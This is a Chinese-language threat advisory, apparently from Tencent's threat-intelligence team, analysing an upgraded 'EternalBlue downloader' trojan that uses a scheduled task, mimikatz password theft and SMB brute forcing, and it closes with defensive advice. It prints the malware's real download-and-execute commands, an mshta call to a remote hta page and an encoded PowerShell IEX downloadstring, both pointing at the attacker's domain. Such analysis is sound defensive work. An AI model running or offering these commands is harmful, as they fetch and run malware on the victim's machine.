御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器攻击方法再升级。本次升级主要变化在于攻击模块,木马在之前的版本上,新增计划任务“DnsScan”,在其中将永恒之蓝攻击模块C:WindowsTempsvchost.exe设置为木马执行当天7:05开始,之后每个一小时执行一次。
该木马团伙持续活跃,最严重的一次破坏是入侵驱动人生公司,篡改商业软件的升级配置,利用正规软件的升级通道传播病毒。在这个木马传播渠道被封堵之后,该团伙仍在利用其他传播渠道持续改进该木马下载器。
去年年末知名装机软件驱动人生利用升级通道向用户投毒,据腾讯御见情报监测仅2 小时感染数十万台电脑,最初名为永恒之蓝下载器的病毒借助驱动人生的升级漏洞进行传播,不过在被封堵后该病毒依然还在活跃着,背后的控制者目前正在利用已被感染还未被清理病毒的电脑持续进行攻击,包括新增爆破模块继续进行传播。
新增多个模块进行持续性攻击:
据腾讯御见情报中心捕获的最新样本,目前永恒之蓝下载器已经新增漏洞攻击以及利用弱口令进行爆破等等,同时背后的攻击者自初次攻击后已经对病毒模块进行多次升级,当前还会向被感染的电脑远程加载挖矿模块,为感染更多的电脑攻击者在最新版本里新增SMB协议的弱口令爆破,尝试连接其他未被感染的电脑进行爆破。永恒之蓝最新版还会利用PowerShell 工具获取被感染电脑的邮件、Cookie、登录FTP服务、发送HTTP请求。 建议用户及时修复漏洞清理病毒:
对于尚未被感染的电脑应该尽快安装补丁对永恒之蓝漏洞进行封堵,若已开启SMB服务则因配置高强度密码,简单密码和弱密码等在经过爆破工具的爆破后可能会被破解,对于企业来说尤其要注意SMB服务器相关问题,普通用户如果不需要使用135、139、445等端口则应将其关闭,避免这类端口开启后可能被病毒利用和感染。
更新后的攻击模块svchost.exe除了利用永恒之蓝漏洞对内网以及外网机器进行扫描攻击外,还新增了以下功能:
1、利用powershell版黑客工具mimikatz抓取用户机器登录密码
创建m.ps1并将混淆后的mimikatz工具代码写入。
将利用工具抓取到的用户登录密码保存到mkatz.ini
2、攻击模块尝试通过内置的弱密码字典尝试SMB爆破远程登录
3、创建计划任务执行远程hta代码
mshtahxxp://w.beahh.com/page.html?p%COMPUTERNAME%
4、创建计划任务执行远程powershell代码
powershell-epbypass-eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
powershell命令解密后内容为:
IEX (New-ObjectNet.WebClient).downloadstring(‘http://v.beahh.com/v’+$env:USERDOMAIN)
安全建议
1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3.使用杀毒软件拦截可能的病毒攻击;
4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统
